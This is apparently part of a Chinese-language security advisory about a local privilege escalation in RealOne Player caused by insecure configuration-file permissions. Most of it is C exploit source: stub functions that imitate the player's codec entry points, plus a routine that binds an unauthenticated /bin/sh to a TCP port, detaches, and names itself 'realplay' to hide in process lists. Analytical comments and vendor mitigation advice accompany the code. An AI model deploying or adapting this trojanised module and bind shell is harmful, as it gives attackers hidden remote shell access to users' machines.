|
RealOne Player不安全配置文件权限本地权限提升漏洞(4)
/*
 * Empty stub functions: each takes no arguments, returns nothing and has an
 * empty body.
 * NOTE(review): the names look like entry points that a host media
 * application would resolve from a loadable module; the part of the listing
 * that would confirm how they are used is not visible here.
 * Triage hint: a module whose expected entry points are all empty, shipped
 * next to one routine that opens a network listener, is a strong sign of a
 * trojanised replacement rather than a genuine component.
 */
void RAFlush(void) { }
void RAGetFlavorProperty(void) { }
void G2(void) { }
void RASetFlavor(void) { }
void RAInitDecoder(void) { }
void RACreateEncoderInstance(void) { }
/*
 * Bind /bin/sh to PORT. It forks and detaches, so it won't easily go away.
 *
 * What the code does, for analysis and detection:
 *   - opens a TCP listener on every local interface (INADDR_ANY) on PORT,
 *     which is defined outside this function;
 *   - detaches from the process that called it (that process exits);
 *   - for each accepted connection, wires the socket to stdin/stdout/stderr
 *     and executes /bin/sh with argv[0] set to "realplay".
 * The peer is never authenticated, and no credentials are changed here, so
 * the shell runs with the identity of whichever process executed this code.
 *
 * Declared int, but there is no return statement: the function either loops
 * forever or leaves through exit().
 */
int cookthis() {
    /* client_pid is assigned below but never read in this function. */
    int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
    struct sockaddr_in server_addr;
    struct sockaddr_in client_addr;

    if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) exit(EXIT_FAILURE);

    /* Listen address: all interfaces, port taken from the PORT macro. */
    bzero((char *) &server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    server_addr.sin_port = htons(PORT);

    if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0) exit(EXIT_FAILURE);

    /*
     * Two fork()/exit rounds, with a new process group and SIGHUP ignored in
     * between. Only the grandchild continues; the original caller exits at
     * the first fork(), which is observable as the host program quitting
     * right after it starts. Any non-zero fork() result, including -1 on
     * failure, also takes the exit path.
     */
    if (fork() != 0) exit(EXIT_SUCCESS);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0) exit(EXIT_SUCCESS);

    /* A listen() failure exits with EXIT_SUCCESS, so it leaves no error status. */
    if ((sock_recv = listen(sock_des, 5)) != 0) exit(EXIT_SUCCESS);

    while (1) {
        sock_len = sizeof(client_addr);
        if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0) exit(EXIT_SUCCESS);
        client_pid = getpid();
        server_pid = fork();
        /*
         * The non-zero branch is the process that called fork(), so it is the
         * accepting process that becomes the shell; the new child closes its
         * copy of the connection and goes back to accept().
         */
        if (server_pid != 0) {
            dup2(sock_client,0);
            dup2(sock_client,1);
            dup2(sock_client,2);
            /*
             * argv[0] is "realplay" while the image is /bin/sh, so a process
             * listing shows the player's name. Detection: compare the listed
             * name with the real executable path, and look for a shell whose
             * standard descriptors are all one TCP socket.
             */
            execl("/bin/sh","realplay",(char *)0);
            /* Reached only if execl() fails. */
            close(sock_client);
            exit(EXIT_SUCCESS);
        }
        close(sock_client);
    }
}
建议:
--------------------------------------------------------------------------------
厂商补丁:

Real Networks
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.real.com

在厂商补丁发布之前,可先检查并收紧该软件配置文件的访问权限,确保其他本地用户无法修改这些文件。
|